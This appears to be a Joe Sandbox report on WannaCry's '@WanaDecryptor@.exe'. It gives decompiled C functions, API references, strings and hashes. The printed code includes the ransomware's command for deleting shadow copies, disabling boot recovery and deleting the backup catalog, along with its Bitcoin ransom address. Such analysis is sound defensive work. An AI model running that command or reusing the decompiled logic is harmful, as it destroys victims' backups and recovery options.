0x0040767f
0x00407688
0x0040768d
0x0040767f
0x00407692
0x00407698
0x0040765e
0x00407660
0x00407667
0x0040766d
0x0040766d

APIs

#2379.MFC42 ref: 00407692

Part of subcall function 004076A0: time.MSVCRT ref: 004076DA

#2379.MFC42(00000001), ref: 00407667

Strings

Wana Decrypt0r 2.0, xrefs: 00407683

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2379$time
String ID: Wana Decrypt0r 2.0
API String ID: 2017816395-4201229886
Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: @WanaDecryptor@.exePID: 8904, Parent PID: 8696COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1683
Total number of Limit Nodes:	14

Executed Functions

Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256
stringwindowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710); // executed
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0); // executed
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
				 *0x42189c = _t90;
				return 1;
			}

APIs

#4710.MFC42 ref: 004064DC
SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D

Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
strrchr.MSVCRT ref: 00406554
strrchr.MSVCRT ref: 00406564
SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
time.MSVCRT ref: 004065D1
__p___argc.MSVCRT(00000202,?), ref: 004065FA
__p___argv.MSVCRT ref: 0040661A
ExitProcess.KERNEL32 ref: 0040665B
__p___argv.MSVCRT ref: 00406666
ExitProcess.KERNEL32 ref: 004066A7
__p___argv.MSVCRT ref: 004066B2
Sleep.KERNELBASE(00002710), ref: 004066F3
sprintf.MSVCRT ref: 0040676A
ExitProcess.KERNEL32 ref: 00406786
SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8

Strings

/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
%s %s, xrefs: 00406764
Wana Decrypt0r 2.0, xrefs: 00406796
cmd.exe, xrefs: 0040671C

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
API String ID: 623806192-606506946
Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98

Uniqueness

Uniqueness Score: -1.00%

Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}

APIs

#324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
#567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
#567.MFC42(00000066,00000000), ref: 0040612F
#567.MFC42(00000066,00000000), ref: 00406147

Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667

Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123

Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032

#567.MFC42(00000066,00000000), ref: 004061DF
#540.MFC42(00000066,00000000), ref: 004061F7
#540.MFC42(00000066,00000000), ref: 00406209
#540.MFC42(00000066,00000000), ref: 00406219
#540.MFC42(00000066,00000000), ref: 00406229
#860.MFC42(00421798,00000066,00000000), ref: 004062F7
#860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
#860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
#1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
#1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
LoadIconA.USER32(00000000,00000080), ref: 0040632F
#860.MFC42(00421798), ref: 00406358

Strings

0ZA, xrefs: 004062B1
0ZA, xrefs: 004062DB
DZA, xrefs: 0040622E
0ZA, xrefs: 004062CB

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
String ID: 0ZA$0ZA$0ZA$DZA
API String ID: 3237077636-3729005435
Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}

APIs

Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689

#1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
#2621.MFC42 ref: 00405A96
#6438.MFC42 ref: 00405A9B

Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229

#2514.MFC42 ref: 00405AC1

Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B

Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB

#800.MFC42 ref: 00405C33
#800.MFC42 ref: 00405C47
#800.MFC42 ref: 00405C5B
#800.MFC42 ref: 00405C6F
#781.MFC42 ref: 00405C83

Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD

Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1

Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD

#609.MFC42 ref: 00405D37
#609.MFC42 ref: 00405D4B
#616.MFC42 ref: 00405D5C
#641.MFC42 ref: 00405D70

Strings

DZA, xrefs: 00405B1F
0ZA, xrefs: 00405AC6
Wana Decrypt0r 2.0, xrefs: 00405A80

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
String ID: 0ZA$DZA$Wana Decrypt0r 2.0
API String ID: 3942368781-2594244635
Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}

APIs

#2514.MFC42 ref: 00407AF1
#537.MFC42(***), ref: 00407B04
#941.MFC42(00421234,***), ref: 00407B1A
#939.MFC42(?,00421234,***), ref: 00407B28
#6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
#6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
